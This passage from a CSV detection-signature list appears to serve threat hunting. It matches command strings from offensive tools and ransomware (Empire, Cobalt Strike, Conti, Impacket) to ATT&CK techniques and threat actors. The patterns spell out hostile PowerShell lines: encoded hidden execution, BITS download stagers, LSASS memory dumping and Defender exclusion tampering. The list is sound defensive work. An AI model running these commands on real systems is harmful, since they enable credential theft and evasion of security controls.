60}*",".{0,1000}powershell\s\-w\shidden\s\-NoExit\s\-c\s\{start\-job\s\-s\s\{while\(\$TRUE\)\{powershell\s\-EnC\s\(\(Get\-PrintJob\sXPS\)\.documentname\s\-join\s\'\'\)\;sleep\s60\}.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","55209" "*powershell*Get-Process keepass*",".{0,1000}powershell.{0,1000}Get\-Process\skeepass.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a 
post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","55211" "*powershell.exe -command ""Add-MpPreference -ExclusionExtension "".exe""*",".{0,1000}powershell\.exe\s\-command\s\""Add\-MpPreference\s\-ExclusionExtension\s\""\.exe\"".{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","55214" "*powershell.exe -command *Enable-PSRemoting -Force* -ComputerName *",".{0,1000}powershell\.exe\s\-command\s.{0,1000}Enable\-PSRemoting\s\-Force.{0,1000}\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","55215" "*powershell.exe -enc $B64ServerScript*",".{0,1000}powershell\.exe\s\-enc\s\$B64ServerScript.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","55217" "*powershell.exe -noninteractive -executionpolicy bypass ipconfig /all*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\sipconfig\s\/all.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #8","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55224" "*powershell.exe -noninteractive -executionpolicy bypass ps lsass*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\sps\slsass.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #11","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti 
ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55225" "*powershell.exe -noninteractive -executionpolicy bypass quser*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\squser.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #10","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55226" "*powershell.exe -noninteractive -executionpolicy bypass rundll32.exe C:\windows\System32\comsvcs.dll* MiniDump * C:\programdata\a.zip full*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\srundll32\.exe\sC\:\\windows\\System32\\comsvcs\.dll.{0,1000}\sMiniDump\s.{0,1000}\sC\:\\programdata\\a\.zip\sfull.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #13","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55227" "*powershell.exe -noninteractive -executionpolicy bypass Start-Process c:\windows\SVN.exe -ArgumentList *-connect * -pass 
Password1234*",".{0,1000}powershell\.exe\s\-noninteractive\s\-executionpolicy\sbypass\sStart\-Process\sc\:\\windows\\SVN\.exe\s\-ArgumentList\s.{0,1000}\-connect\s.{0,1000}\s\-pass\sPassword1234.{0,1000}","offensive_tool_keyword","conti","Conti Ransomware Proxyshell PowerShell command #12","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","Wizard Spider - Black Basta","Ransomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55228" "*powershell.exe -nop -c ""start-job *Import-Module BitsTransfer*$env:temp*GetRandomFileName()*Start-BitsTransfer -Source 'http*Remove-Item*Receive-Job*","powershell\.exe\s\-nop\s\-c\s\""start\-job\s.{0,1000}Import\-Module\sBitsTransfer.{0,1000}\$env\:temp.{0,1000}GetRandomFileName\(\).{0,1000}Start\-BitsTransfer\s\-Source\s\'http.{0,1000}Remove\-Item.{0,1000}Receive\-Job.{0,1000}","offensive_tool_keyword","powershell","deployment of a payload through a PowerShell stager using bits to download","T1197","TA0009","N/A","N/A","Collection","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","55229" "*powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc *",".{0,1000}powershell\.exe\s\-NoP\s\-NoL\s\-sta\s\-NonI\s\-W\sHidden\s\-Exec\sBypass\s\-Enc\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","55234" "*powershell.exe -NoP -sta -NonI -W Hidden -Command *Action = New-ScheduledTaskAction -Execute *",".{0,1000}powershell\.exe\s\-NoP\s\-sta\s\-NonI\s\-W\sHidden\s\-Command\s.{0,1000}Action\s\=\sNew\-ScheduledTaskAction\s\-Execute\s.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","55236" "*powershell.exe nothing to see here! 
:-P*",".{0,1000}powershell\.exe\snothing\sto\ssee\shere!\s\:\-P.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","55238" "*powershell.exe -win hidden -NonI -c (icm -scriptblock ([scriptblock]::Create([System.Text.Encoding]*",".{0,1000}powershell\.exe\s\-win\shidden\s\-NonI\s\-c\s\(icm\s\-scriptblock\s\(\[scriptblock\]\:\:Create\(\[System\.Text\.Encoding\].{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","55242" "*powershell_code_execution_invoke_assembly*",".{0,1000}powershell_code_execution_invoke_assembly.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - 
T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55248" "*powershell_collection_keylogger*",".{0,1000}powershell_collection_keylogger.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55249" "*powershell_collection_screenshot*",".{0,1000}powershell_collection_screenshot.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55250" "*powershell_command_x64.ps1*",".{0,1000}powershell_command_x64\.ps1.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","55251" "*powershell_command_x86.ps1*",".{0,1000}powershell_command_x86\.ps1.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","55252" "*powershell_credentials_tokens*",".{0,1000}powershell_credentials_tokens.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - 
Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55253" "*powershell_encode_oneliner*",".{0,1000}powershell_encode_oneliner.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55254" "*powershell_encode_oneliner*",".{0,1000}powershell_encode_oneliner.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team 
Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55255" "*powershell_encode_stager*",".{0,1000}powershell_encode_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55256" "*powershell_encode_stager*",".{0,1000}powershell_encode_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 
- T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55257" "*powershell_management_psinject*",".{0,1000}powershell_management_psinject.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - 
T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55258" "*powershell_management_spawn*",".{0,1000}powershell_management_spawn.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
